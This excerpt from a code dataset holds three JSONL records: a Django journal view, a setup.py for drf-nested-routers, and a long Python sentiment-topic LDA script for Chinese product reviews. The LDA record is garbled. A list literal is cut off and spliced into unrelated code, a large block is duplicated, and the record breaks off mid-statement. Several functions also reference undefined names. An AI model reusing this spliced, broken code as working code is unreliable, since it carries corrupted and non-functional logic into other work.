+{"seq_id": "372507681", "text": "from django.shortcuts import render, redirect\nfrom django.contrib import auth\nfrom MedApp.models import *\nfrom datetime import datetime\n\n# Create your views here.\n\nTIME_FORMAT = '%Y-%m-%d'\nDAYS = {\n 'Monday' : 'Понедельник',\n 'Tuesday' : 'Вторник',\n 'Wednesday' : 'Среда',\n 'Thursday' : 'Четверг',\n 'Friday' : 'Пятница',\n 'Saturday' : 'Суббота',\n 'Sunday' : 'Воскресенье',\n }\n\ndef journal(request):\n if auth.get_user(request).is_active:\n out_dict = {}\n today = datetime.today().date()\n out_dict['journalapp_active'] = True\n out_dict['User'] = auth.get_user(request)\n out_dict['Clients'] = Client.objects.filter(user_id = auth.get_user(request).id)\n out_dict['ServicesForClients'] = UslugaDlaClienta.objects.filter(user_id = auth.get_user(request).id)\n out_dict['Services'] = Usluga.objects.all()\n out_dict['Today'] = datetime.today().date()\n dates = []\n days_ru = []\n for date in UslugaDlaClienta.objects.filter(user_id = auth.get_user(request).id).order_by('date'):\n if date.date not in dates:\n dates.append(date.date)\n out_dict['Dates'] = dates\n for day in dates:\n if day >= today:\n day_eng = day.strftime('%A')\n day_str = DAYS.get(day_eng)\n days_ru.append(day_str)\n out_dict['DaysRu'] = days_ru\n return render(request, 'journal/journal.html', out_dict)\n else:\n return redirect('/')\n\ndef calculate(request, date):\n return redirect('/calculate/')", "sub_path": "stack_project/Project/journal/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1661, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.contrib.auth.get_user", "line_number": 20, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 20, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 24, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 26, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "352516597", "text": "#!/usr/bin/env python\nimport os\n\nfrom setuptools import find_packages, setup\n\ncurdir = os.path.dirname(os.path.abspath(__file__))\n\nsetup(\n name='drf-nested-routers',\n description='Nested resources for the Django Rest Framework',\n long_description=open('README.md').read(),\n license='Apache',\n version='0.11.0',\n author='Alan Justino et al.',\n author_email='alan.justino@yahoo.com.br',\n url='https://github.com/alanjds/drf-nested-routers',\n install_requires=['djangorestframework>=2.4'],\n setup_requires=['setuptools'],\n packages=find_packages(curdir),\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 8, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "11285275", "text": "import sys\n\nsys.path.append('G:/anconada/envs/py36/lib/site-packages')\nfrom prettytable import PrettyTable\nimport re\nimport jieba\nimport os\nimport copy\nfrom zhon.hanzi import punctuation\nfrom scipy.misc import imread\nfrom wordcloud import WordCloud\nfrom wordcloud import ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport random\nfrom prettytable import PrettyTable\nimport gc\nimport time\nfrom gensim.models import word2vec\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\n# from guppy import hpy\nimport json\nimport psutil\nfrom gensim import corpora\nfrom scipy.sparse import coo_matrix\nfrom functools import partial\nfrom scipy.special import gammaln, psi\nimport scipy\n\n''' 在写论文的时候可以使用两组数据查看模型的效果'''\n\nclass ldamodel_sent():\n def __init__(self, topic_num, sentiment_num, alpha, beta, gamma,corpus,\n batch_size, iteration,sentiment_dict):\n self.T = topic_num\n self.D = None\n self.S = sentiment_num\n self.V = None\n self.corpus=corpus\n self.wordOccurenceMatrix=None\n\n self.sentiment_dict = sentiment_dict # 这是一个字典,key为word,value为list\n\n # 超参数设置\n self.alpha = alpha if alpha else 0.01\n self.beta = beta if beta else 0.01\n self.gamma = gamma if gamma else 0.01\n self.alpha_lz = None\n self.alphasum_l = None\n self.z_count=None\n self.l_count=None\n\n self.beta_lzw = None\n self.betasum_lz = None\n self.add_lw =None\n\n self.gamma_dl =None\n self.gammasum_d = None\n\n self.iteration = iteration if iteration else 1000\n self.batch_size=batch_size\n self.word2id = None\n self.id2word = None\n\n #\n self.coherence=None\n self.word_sentiment_vocabulary = {}\n self.sentiment_word_list = {}\n \n # 设置参数\n self.doc_sel_topic_count = None\n self.topic_sel_word_count = None\n self.doc_count = None\n self.topic_count = None\n self.sentiment_count = None\n self.topic_sentiment_count = None\n self.sentiment_topic_count=None\n self.sentiment_topic_word_count=None\n self.doc_sentiment_count = None\n self.sentiment_word_count=None\n self.topic_word_count=None\n self.word_sentiment_vocabulary=None\n\n self.doc_sel_topic = None\n self.topic_sel_word = None\n self.sentiment_topic_word=None\n self.doc_sel = None\n\n self.z = None\n self.l = None\n self.all_loglikelihood=[]\n self.all_perplexity=[]\n\n\n def createdictionary(self):\n self.word2id={}\n self.V=0\n self.D=0\n wordnum=0\n for i ,doc in enumerate(self.corpus):\n for j ,word in enumerate(doc):\n if word not in self.word2id.keys():\n if word != '':\n wordnum+=1\n self.word2id[word]=len(self.word2id)\n\n else:\n continue\n\n self.V=wordnum\n self.D=len(self.corpus)\n self.id2word=dict(zip(self.word2id.values(),self.word2id.keys()))\n print('语料库中总共有{0} 个token'.format(self.V))\n print('word2id的长度:',len(self.word2id))\n print('id2word的长度',len(self.id2word))\n\n\n def sampleFromDirichlet(self,gamma):\n return np.random.dirichlet(gamma)\n\n def initial(self):\n self.alpha_lz = np.full((self.S, self.T), fill_value=self.alpha)\n self.alphasum_l = np.full((self.T,), fill_value=self.alpha * self.T)\n\n self.beta_lzw = np.full((self.S, self.T, self.V), fill_value=self.beta)\n self.betasum_lz = np.zeros((self.S, self.T), dtype=np.float)\n self.add_lw = np.ones((self.S, self.V), dtype=np.float)\n\n \n self.wordOccurenceMatrix=np.zeros((self.D,self.V))\n for i,doc in enumerate(self.corpus):\n for j,word in enumerate(doc):\n word_id=self.word2id[word]\n self.wordOccurenceMatrix[i,word_id] +=1\n \n for l in range(self.S):\n for z in range(self.T):\n for r in range(self.V):\n self.beta_lzw[l][z][r] *= self.add_lw[l][r]\n self.betasum_lz[l][z] += self.beta_lzw[l][z][r]\n\n self.gamma_dl = np.full((self.D, self.T), fill_value=0.0)\n self.gammasum_d = np.full(shape=(self.D), fill_value=0.0)\n\n for d in range(self.D):\n # self.gamma_dl[d][1] = 1.8\n self.gamma_dl[d][1] = self.gamma\n self.gamma_dl[d][2] = self.gamma\n for d in range(self.D):\n for l in range(self.S):\n self.gammasum_d[d] += self.gamma_dl[d][l]\n self.doc_sel_topic_count = np.zeros([self.D, self.S, self.T])\n print('the shape of doc_Sel_topic_count:',self.doc_sel_topic_count.shape)\n self.topic_sel_word_count = np.zeros([self.T, self.S, self.V])\n self.doc_count = np.zeros(self.D)\n self.sentiment_count = np.zeros(self.S) ##这个不是必须的\n self.topic_count = np.zeros(self.T) ##这个不是必须的\n self.topic_sentiment_count = coo_matrix((self.T, self.S)).toarray()\n self.doc_sentiment_count = coo_matrix((self.D, self.S)).toarray()\n self.sentiment_word_count=coo_matrix((self.S,self.V)).toarray()\n self.topic_word_count=coo_matrix((self.T,self.V)).toarray()\n\n self.sentiment_topic_count = coo_matrix((self.S, self.T)).toarray()\n self.sentiment_topic_word_count =np.zeros([self.S, self.T ,self.V])\n\n self.doc_sel_topic = np.ndarray((self.D, self.S, self.T))\n self.topic_sel_word = np.ndarray((self.T, self.S, self.V))\n self.doc_sel = np.ndarray((self.D, self.S))\n self.sentiment_topic_word=np.ndarray((self.S, self.T,self.V))\n \n\n\n self.z = coo_matrix((self.D, self.V), dtype=np.int8).toarray() # 存放每个文档中每一个词的主题\n self.l = coo_matrix((self.D, self.V), dtype=np.int8).toarray() # 存放每个文档中每个词的情感极性\n self.z_count={}\n self.l_count={}\n print('开始赋予sentiment')\n gamma=[self.gamma for _ in range(self.S)]\n alpha=[self.alpha for _ in range(self.T)]\n for i, doc in enumerate(self.corpus):\n sentimentDistribution = self.sampleFromDirichlet(gamma)\n topicDistribution = np.zeros(( self.S,self.T))\n for s in range(self.S):\n topicDistribution[s, :] = self.sampleFromDirichlet(alpha)\n for j, word in enumerate(doc): \n word_id = int(self.word2id[word])\n sample_sentiment = self.sampleFromCategorical(sentimentDistribution)\n topic = self.sampleFromCategorical(topicDistribution[s,:])\n #topic = int(random.randint(0, self.T - 1))\n prior_sentiment=self.sentiment_dict[word]\n sentiment=self.sentiment_dict[word] # 需要注意的是这个地方随着查看的情感的不同需要一直改变\n\n #final_sentiment=random.sample([prior_sentiment,sentiment],1)[0]\n final_sentiment=prior_sentiment\n self.doc_sel_topic_count[i,final_sentiment,topic] += 1\n #print(sentiment)\n self.topic_sel_word_count[topic,final_sentiment, word_id] += 1\n \n self.doc_count[i] += 1\n self.sentiment_count[final_sentiment] += 1\n self.sentiment_topic_count[final_sentiment,topic]+=1\n self.sentiment_topic_word_count[final_sentiment,topic,word_id]+=1\n\n self.topic_count[topic] += 1\n self.topic_sentiment_count[topic, final_sentiment] += 1\n self.doc_sentiment_count[i, final_sentiment] += 1\n self.sentiment_word_count[final_sentiment,word_id]+=1\n self.topic_word_count[topic,word_id]+=1\n\n self.z_count[(i,j)]=topic\n self.l_count[(i,j)]=final_sentiment\n \n\n\n\n def gibbssampling(self):\n for iter in range(self.iteration):\n # 采用小批量进行训练\n for i, doc in enumerate(self.corpus):\n \n for j, word in enumerate(doc):\n try:\n word_id = int(self.word2id[word])\n topic = int(self.z_count[(i, j)])\n prior_sentiment=self.sentiment_dict[word]\n sentiment=self.l_count[(i,j)]\n\n \n \n if self.doc_sel_topic_count[i, sentiment, topic]<=0:\n self.doc_sel_topic_count[i, sentiment, topic]=0\n else:\n self.doc_sel_topic_count[i, sentiment, topic] -= 1\n\n if self.topic_sel_word_count[topic,sentiment, word_id]<=0:\n self.topic_sel_word_count[topic,sentiment, word_id]=0\n else:\n self.topic_sel_word_count[topic,sentiment, word_id] -= 1\n\n if self.topic_sentiment_count[topic, sentiment]<=0:\n self.topic_sentiment_count[topic, sentiment]=0\n else:\n self.topic_sentiment_count[topic, sentiment] -= 1\n\n if self.doc_sentiment_count[i, sentiment]<=0:\n self.doc_sentiment_count[i, sentiment] =0\n else:\n self.doc_sentiment_count[i, sentiment]-=1\n\n if self.topic_count[topic]<=0:\n self.topic_count[topic]=0\n else:\n self.topic_count[topic] -= 1\n\n if self.sentiment_count[sentiment]<=0:\n self.sentiment_count[sentiment]=0\n else:\n self.sentiment_count[sentiment] -=1\n\n if self.topic_word_count[topic,word_id]<=0:\n self.topic_word_count[topic,word_id]=0\n else:\n self.topic_word_count[topic,word_id]-=1\n\n if self.sentiment_word_count[sentiment,word_id]<=0:\n self.sentiment_word_count[sentiment,word_id]=0\n else:\n self.sentiment_word_count[sentiment,word_id]-=1\n \n if self.sentiment_topic_word_count[sentiment,topic,word_id]<=0:\n self.sentiment_topic_word_count[sentiment,topic,word_id]=0\n else:\n self.sentiment_topic_word_count[sentiment,topic,word_id]-=1\n\n if self.sentiment_topic_count[sentiment,topic]<=0:\n self.sentiment_topic_count[sentiment,topic]=0\n else:\n self.sentiment_topic_count[sentiment,topic]-=1\n\n #print('resampling')\n n_dst=self.doc_sel_topic_count[i,:,:]\n n_tsw=self.topic_sel_word_count[:,:,word_id]\n n_ds=self.doc_sentiment_count[i,:]\n n_ts=self.topic_sentiment_count\n n_d=self.doc_count[i]\n \n new_topic, new_sentiment = self.resampling(n_dst,n_tsw,n_ds,n_ts,n_d)\n \n## ind = self.sampleFromCategorical(probabilities_ts.flatten())\n## new_topic, new_sentiment = np.unravel_index(ind, probabilities_ts.shape)\n\n \n self.z_count[(i,j)]=new_topic\n self.l_count[(i,j)]=new_sentiment\n \n \n self.doc_sel_topic_count[i, new_sentiment, new_topic] += 1\n self.topic_sel_word_count[ new_topic,new_sentiment , word_id] += 1\n self.topic_sentiment_count[new_topic, new_sentiment] += 1\n self.doc_sentiment_count[i, new_sentiment] += 1\n self.topic_count[new_topic] += 1\n self.sentiment_count[new_sentiment] += 1\n self.topic_word_count[new_topic,word_id]+=1\n self.sentiment_word_count[new_sentiment,word_id]+=1\n self.sentiment_topic_count[new_sentiment,new_topic]+=1\n self.sentiment_topic_word_count[new_sentiment,new_topic,word_id ]+=1\n \n\n except Exception as result:\n print('result:',result)\n \n if (iter+1)%10 == 0:\n print('开始第{0}次迭代'.format(iter+1))\n self.updateparam()\n print('训练过程结束')\n\n\n def updateparam(self):\n for i in range(self.D):\n for j in range(self.S):\n self.doc_sel[i, j] = (self.doc_sentiment_count[i, j] + 0.01)/(self.doc_count[i] +\n self.S * 0.01)\n\n\n for i in range(self.T):\n for j in range(self.S):\n for k in range(self.V):\n self.topic_sel_word[i, j, k] = (self.topic_sel_word_count[i, j, k] + self.beta_lzw[j][i][k])/\\\n (self.topic_sentiment_count[i, j] + self.betasum_lz[j][i])\n\n for i in range(self.S):\n for j in range(self.T):\n for k in range(self.V):\n self.sentiment_topic_word[i, j, k] = (self.sentiment_topic_word_count[i, j, k] + self.beta_lzw[i][j][k])/\\\n (self.sentiment_topic_count[i, j] + self.betasum_lz[i][j])\n\n for i in range(self.D):\n for j in range(self.S):\n for k in range(self.T):\n self.doc_sel_topic[i, j, k] = (self.doc_sel_topic_count[i, j, k] + self.alpha_lz[j][k])/\\\n (self.doc_sentiment_count[i, j] + self.alphasum_l[j] )\n print('参数更新完成******************* \\n')\n return\n\n \n##\n def sampleFromCategorical(self,theta):\n theta = theta/np.sum(theta)\n return np.random.multinomial(1, theta).argmax()\n \n def resampling(self,n_dst,n_tsw,n_ds,n_ts,n_d ):\n pk = np.zeros([self.T, self.S])\n## for t in range(self.T):\n## for s in range(self.S):\n## pk[t,s]= float((self.doc_sel_topic_count[doc_id,s,t] + self.alpha_lz[s,t]) *\\\n## (self.topic_sel_word_count[ t,s,word_id] + self.beta ) * \\\n## (self.doc_sentiment_count[doc_id, s]+ self.gamma) / \\\n## (self.doc_sentiment_count[doc_id, s] + self.alphasum_l[s]) *\\\n## (self.topic_sentiment_count[t,s]+ self.betasum_lz[s,t]) * \\\n## (self.doc_count[doc_id] + self.gammasum_d[doc_id]))\n \n #pk[t, s] += pk[t, s - 1]\n for t in range(self.T):\n for s in range(self.S):\n pk[t,s]= float((n_dst[s,t] + self.alpha) *\\\n (n_tsw[t,s] + self.beta ) * \\\n (n_ds[s]+ self.gamma) / \\\n ( n_ds[s] + self.alpha * self.T) *\\\n (n_ts[t,s]+ self.beta * self.V) * \\\n (n_d + self.gamma * self.S))\n \n \n u = random.random()\n flag=0\n for j in range(self.T):\n for k in range(self.S):\n if pk[j, k] >= u:\n flag=1\n return j,k\n if flag==0:\n se = random.randint(0, self.S - 1)\n to = random.randint(0, self.T - 1)\n return to, se\n## pk /= np.sum(pk)\n## return pk\n\n## def log_multi_beta(self,alpha, K=None):\n## if K is None:\n## # alpha is assumed to be a vector\n## return np.sum(scipy.special.gammaln(alpha)) - scipy.special.gammaln(np.sum(alpha))\n## else:\n## # alpha is assumed to be a scalar\n## return K * scipy.special.gammaln(alpha) - scipy.special.gammaln(K*alpha)\n## \n## def loglikelihood(self):\n## n_docs=len(self.corpus)\n## lik = 0\n##\n## for z in range(self.T):\n## for s in range(self.S):\n## lik += self.log_multi_beta(self.topic_sel_word_count[z, s,:]+self.beta)\n## \n## lik -= self.T * self.S * self.log_multi_beta(self.beta, self.V)\n##\n## for m in range(n_docs):\n## for z in range(self.S):\n## lik += self.log_multi_beta(self.doc_sel_topic_count[m, z, :]+self.gamma_dl[m,:])\n## \n## lik += self.log_multi_beta(self.doc_sentiment_count[m,:]+self.alpha_lz)\n## \n## lik -= n_docs * self.S * self.log_multi_beta(self.gamma_dl)\n## lik -= n_docs * self.log_multi_beta(self.alpha_lz)\n## \n## return lik\n## \n## def perplexity(self):\n## score = np.exp(-self.loglikelihood()/self.wordOccurenceMatrix.sum())\n## return score\n \n\n\n\n\n def get_top_sentiment_topic(self, topnums):\n '''每一个sentiment下的top-topic\n 可以利用prettyTable进行显示\n '''\n table=PrettyTable()\n\n with open('C:/Users/Administrator/Desktop/data/评论/top_sentiment_topic_word.txt', 'w',encoding='utf-8') as f:\n for i in range(0, self.T):\n for j in range(self.S):\n top_words = np.argsort(self.topic_sel_word[i,j :]).tolist()[:topnums]\n #print('输出的是每个topic的top_word的下标',top_words)\n print(top_words)\n top_word = [self.id2word[kk] for kk in top_words[0]]\n table.add_column('sentiment{0}and topic_{1}'.format(i,j),top_word)\n res = 'sentiment:{0},topic{1}: \\t {2} '.format(i,j,top_word)\n f.write(res + '\\n')\n f.close()\n print(table)\n # print(res)\n def get_sentiment_word(self,topnums):\n #得到每个sentiment下的word\n table=PrettyTable()\n with open('C:/Users/Administrator/Desktop/data/评论/top_sentiment_word','w',encoding='utf-8') as f:\n for i in range(self.S):\n top_words=np.argsort(self.sentiment_word_count[i,:]).tolist()[:topnums]\n #print(top_words)\n top_word=[self.id2word[j] for j in top_words]\n table.add_column('sentiment_{0}'.format(i),top_word)\n res='sentiment:{0} has topic_word \\t {1}'.format(i,top_word)\n f.write(res)\n print(table)\n\n def get_wordsentiment(self,sentiment_index,topnum=20):\n '''\n 得到给定一个情感下的每个主题的词汇,以及概率\n 只输出其中三个topic/的topnum的词汇\n sentiment_word\n 利用\n :return:\n '''\n print('显示sentiment_index={0}下的3个主题的关键词汇'.format(sentiment_index))\n table=PrettyTable()\n word_list=[]\n for i in range(3):\n values_sentiment_topic=self.sentiment_topic_word[sentiment_index,i,:]\n max_list=np.argsort(values_sentiment_topic,).tolist()[-topnum:]\n ui=[]\n for id in max_list:\n ui.append((self.id2word[id],values_sentiment_topic[id]))\n #print(ui)\n word_list.append(ui)\n table.add_column('topic_{0}'.format(i),top_word)\n return word_list\n\n \n \n\n def get_word_sentiment0(self,seta):\n '''\n 得到每个词语的情感极性\n :return:self.word_sentiment_vocabulary\n '''\n # 主要使用sentiment-topic-word\n print('开始求解sentiment_word_list')\n sentiment_word_list={}\n word_sentiment_vocabulary={}\n for i in range(self.V):\n values=self.sentiment_topic_word[:,:,i]\n \n # 获取到了每一个主题下每一个词汇的值,根据其最大值所在位置,找到该所所在的情感\n m_index=np.argmax(values,axis=1)\n max_list=np.array([values[ii ,m_index[ii]] for ii in range(4)])\n max_index=np.argmax(max_list)\n word_sentiment_vocabulary[self.id2word[i]]=(max_index,max_list[max_index])\n if max_list[max_index] >=seta :\n if max_index not in sentiment_word_list.keys():\n sentiment_word_list[max_index]=[]\n sentiment_word_list[max_index].append([self.id2word[i],max_list[max_index]])\n else:\n continue\n self.sentiment_word_list=sentiment_word_list\n self.word_sentiment_vocabulary=word_sentiment_vocabulary\n print('得到所有词汇利用主题模型得到的情感极性')\n print(len(self.sentiment_word_list[0])+len(self.sentiment_word_list[1])+\n len(self.sentiment_word_list[2]))\n return\n \n def get_topic_word(self, topnums):\n '''得到每个topic下的top-word'''\n\n table=PrettyTable()\n with open('C:/Users/Administrator/Desktop/data/评论/top_topic_word_sel','w',encoding='utf-8') as f:\n for i in range(self.T):\n top_words=np.argsort(self.topic_word_count[i,:]).tolist()[:topnums]\n print(top_words)\n top_word=[self.id2word[j] for j in top_words]\n table.add_column('topic_{0}'.format(i),top_word)\n res='topic:{0} has topic_word \\t {1}'.format(i,top_word)\n f.write(res)\n print(table)\n\n\n def pingu(self,emplsion,type):\n '''\n :param 使用topic coherence 对模型进行评价 umass metric ----score d(j)-表示语料库中包含词汇j的个数 d(i,j)表示词汇i和j共同出现的词汇、\n 其中词汇i以及j取自同一个情感标签\n :return:topic coherence\n '''\n coherence_umass=[]\n for i in range(self.S):\n word_list=[word_par[0] for word_par in self.sentiment_word_list[i]]\n coherence_umass.append(sum([self._scoreumass(i,j,emplsion) for i in word_list for j in word_list] ))\n self.coherence=sum(coherence_umass)\n print('umass_metric 下的topic coherence:{0}'.format(self.coherence ))\n return self.coherence\n\n\n def _scoreumass(self,i,j,emplsion):\n '''\n :param i: 词汇i\n :param j: 词汇j\n :param emplsion:\n :return: score\n '''\n count_j=0\n count_ij=0\n for doc in self.corpus:\n if j in doc:\n count_j+=1\n if j in doc and i in doc:\n count_ij+=1\n score =np.log2((count_ij+emplsion)/count_j)\n return score\n\n \n \n def print_doc_topic_word(self, doc_id, topic_list, word_nums=20):\n all_num = len(topic_list)\n table = PrettyTable()\n for i in topic_list:\n topword = np.argsort(self.topic_word[i, :])[:word_nums]\n table.add_column(i, [self.id2word[jj] for jj in topword])\n print(table)\n\n # 打印出来该文档上的主题分布以及在每个主题上面的个数的图形\n doc_topic_count = self.doc_topic_count[doc_id, :]\n sns.stripplot(x=list(range(0, all_num - 1)), y=doc_topic_count)\n for i in topic_list:\n sns.scatterplot(x=range(0, self.V - 1), y=self.topic_word[i, :])\n plt.show()\n sns.countplot(x=range(0, self.V - 1), hue=self.topic_word[i, :])\n plt.show()\n\ndef get_result(k,comment_train,sentiment_dict):\n M = ldamodel_sent(k, 4,0.01, 0.01, 0.01, comment_train, len(comment_train), 200, sentiment_dict)\n M.createdictionary()\n M.initial()\n start=time.time()\n M.gibbssampling()\n M.get_word_sentiment0(seta=0.01)\n M.pingu(emplsion=0.000001,type='umass_metric')\n end = time.time()\n print('gibbssampling stage use {0} second'.format(end - start))\n print(k,'完成')\n return M.coherence\n\n\nif __name__ == '__main__':\n path1='C:/Users/Administrator/Desktop/data/corpus/handle_corpus_train.txt'\n print('开始加载数据')\n da=open(path1,encoding='utf-8').read()\n da1=da.lstrip('\\ufeff')\n data=json.loads(da1)\n corpus_total=data['正面']+data['反面']\n \n \n \n \n sentiment_path='C:/Users/Administrator/Desktop/data/corpus/sentiment_corpus_train.txt'\n se = open(sentiment_path, encoding='utf-8').read()\n se = se.lstrip('\\ufeff')\n sentiment_dict= json.loads(se)\n print('水杯评论加载完毕')\n \n corpus_cup=[]\n for doc in corpus_total:\n if len(doc) !=0:\n corpus_cup.append(doc)\n #comment_train, comment_test = train_test_split(corpus, test_size=0)\n comment_train=corpus_cup\n # cut_corpus是cut_comment\n #topic_list=[10,50,70,100]\n result=[]\n P = ldamodel_sent(5, 4, 0.01, 0.01, 0.01, comment_train, len(comment_train), 40, sentiment_dict)\n P.createdictionary()\n print('开始初始化')\n P.initial()\n print('初始化阶段的doc_sentiment_count')\n print(P.doc_sentiment_count)\n print(P.doc_count)\n start=time.time()\n P.gibbssampling()\n\n\n\n \n## from scipy.cluster.hierarchy import linkage, dendrogram, fcluster\n## import scipy.cluster.hierarchy as sch\n## from sklearn.decomposition import PCA\n## pca=PCA()\n## x=M.topic_w\n## x_new=pca.fit_transform(x)\n## disMat = sch.distance.pdist(x_new,'euclidean') \n## Z = linkage(disMat, method='ward')\n## P=sch.dendrogram(Z)\n## plt.title('Dendrogram for the Agglomerative Clustering')\n## plt.xlabel('sample_index')\n## plt.ylabel('distance')\n## plt.show()\n##\n## \n## labels_1 = fcluster(Z, t=1, criterion='inconsistent')\n## mark = ['or', 'ob', 'og', 'ok', '^r', '+r', 'sr', 'dr', '=20:\n test[i]=doc\n #获得上面test中10则评论所对应的文档{-}情感分布\n \n ds=M.doc_sel\n test_dc=np.zeros((10,4))\n i=0\n for doc_id,doc in test.items():\n test_dc[i,:]=ds[doc_id,:]\n i+=1\n if i>=10:\n break\n \n \n\n #最后得到word-sentiment-vocabulary\n word_sentiment_vocabulary={}\n for i in range(p):\n values=stw_new[:,:,i]\n # 获取到了每一个主题下每一个词汇的值,根据其最大值所在位置,找到该所所在的情感\n m_index=np.argmax(values,axis=1)\n max_list=np.array([values[ii ,m_index[ii]] for ii in range(4)])\n max_index=np.argmax(max_list)\n word_sentiment_vocabulary[id2word[i]]=(max_index,max_list[max_index])\n\n #情感得分的计算\n\n \n sentence=set()\n for doc in corpus_cup:\n sentence.add(' '.join(doc))\n sentence=list(sentence)\n id2word=corpora.Dictionary(corpus_cup)\n word2id=id2word.token2id\n corpus = [id2word.doc2bow(text) for text in corpus0]\n model=models.TfidfModel(corpus,id2word=id2word)\n weight_corpus=model[corpus]\n\n def get_sentiment_score(pinglun,pinglun_index):\n jx_list=[]\n wordid_list=[]\n power=[]\n for word in pinglun :\n id_word=word2id[word]\n jx,par_jx=word_sentiment_vocabulary[word]\n if jx==0:\n power.append(1)\n elif jx==3:\n power.append(3)\n else:\n power.append(4)\n jx_list.append(jx)\n wordid_list.append(id_word)\n score=sum([power[i]*jx_list[i]*weight_corpus[pinglun_index][wordid_list[i]] for i in range(len(pinglun))])\n return score\n\n #按照店铺整理数据\n path_info='C:/Users/Administrator/Desktop/data/评论/product_info_cup_before.csv'\n info_dianpu=pd.read_csv(path_info,engine='python',encoding='utf-8')\n\n ii=info_dianpu['shop_id'].value_counts()\n\n dianpu_info={}\n count_ii=ii.head(n=10)\n for i in range(len(count_ii)):\n product_id=info_dianpu[info_dianpu['shop_id']==count_ii.index[i]]['product_id'].values.tolist()\n shop_name=info_dianpu[info_dianpu['shop_id']==count_ii.index[i]]['shop_name'].unique()[0]\n if shop_name not in dianpu_info.keys():\n dianpu_info[shop_name]=[]\n dianpu_info[shop_name].extend(product_id)\n\n path='C:/Users/Administrator/Desktop/data/评论/comment_info_cup_final.csv'\n df_data=pd.read_csv(path,engine='python')\n oo=df_data['referenceId'].value_counts()\n pp=oo[oo>=300].index.tolist()\n corpus_dianpu={}\n for dianpu,product_id_list in dianpu_info.items():\n for product_id in product_id_list:\n if product_id in pp:\n ui = df_data[df_data['referenceId'] == product_id]['comment'].values.tolist()\n else:\n continue\n if dianpu not in corpus_dianpu.keys():\n corpus_dianpu[dianpu]=[]\n corpus_dianpu[dianpu].append(ui)\n\n\n from scipy.cluster.hierarchy import linkage, dendrogram, fcluster\n import scipy.cluster.hierarchy as sch\n from sklearn.decomposition import PCA\n pca=PCA()\n x=new_twc\n x_new=pca.fit_transform(x)\n disMat = sch.distance.pdist(x_new,'euclidean') \n Z = linkage(disMat, method='ward')\n P=sch.dendrogram(Z)\n plt.title('Dendrogram for the Agglomerative Clustering')\n plt.xlabel('sample_index')\n plt.ylabel('distance')\n plt.show()\n\n \n labels_1 = fcluster(Z, t=1, criterion='inconsistent')\n## mark = ['or', 'ob', 'og', 'ok', '^r', '+r', 'sr', 'dr', '=20:\n test[i]=doc\n doc_sel=np.zeros((M.D,4))\n for i in range(M.D):\n for j in range(M.S):\n doc_sel[i, j] = (M.doc_sentiment_count[i, j] + 0.01)/(M.doc_count[i] +M.S * 0.01)\n ds=M.doc_sel\n test_dc=np.zeros((10,4))\n i=0\n for doc_id,doc in test.items():\n test_dc[i,:]=ds[doc_id,:]\n i+=1\n if i>=10:\n break\n \n \n #最后得到word-sentiment-vocabulary\n word_sentiment_vocabulary={}\n for i in range(p):\n values=stw_new[:,:,i]\n # 获取到了每一个主题下每一个词汇的值,根据其最大值所在位置,找到该所所在的情感\n m_index=np.argmax(values,axis=1)\n max_list=np.array([values[ii ,m_index[ii]] for ii in range(4)])\n max_index=np.argmax(max_list)\n word_sentiment_vocabulary[id2word[i]]=(max_index,max_list[max_index])\n\n #情感得分的计算\n\n \n sentence=set()\n for doc in corpus_cup:\n sentence.add(' '.join(doc))\n sentence=list(sentence)\n id2word=corpora.Dictionary(corpus_cup)\n word2id=id2word.token2id\n corpus = [id2word.doc2bow(text) for text in corpus0]\n model=models.TfidfModel(corpus,id2word=id2word)\n weight_corpus=model[corpus]\n\n def get_sentiment_score(pinglun,pinglun_index):\n jx_list=[]\n wordid_list=[]\n power=[]\n for word in pinglun :\n id_word=word2id[word]\n jx,par_jx=word_sentiment_vocabulary[word]\n if jx==0:\n power.append(1)\n elif jx==3:\n power.append(3)\n else:\n power.append(4)\n jx_list.append(jx)\n wordid_list.append(id_word)\n score=sum([power[i]*jx_list[i]*weight_corpus[pinglun_index][wordid_list[i]] for i in range(len(pinglun))])\n return score\n\n #按照店铺整理数据\n path_info='C:/Users/Administrator/Desktop/data/评论/product_info_cup_before.csv'\n info_dianpu=pd.read_csv(path_info,engine='python',encoding='utf-8')\n\n ii=info_dianpu['shop_id'].value_counts()\n\n dianpu_info={}\n count_ii=ii.head(n=10)\n for i in range(len(count_ii)):\n product_id=info_dianpu[info_dianpu['shop_id']==count_ii.index[i]]['product_id'].values.tolist()\n shop_name=info_dianpu[info_dianpu['shop_id']==count_ii.index[i]]['shop_name'].unique()[0]\n if shop_name not in dianpu_info.keys():\n 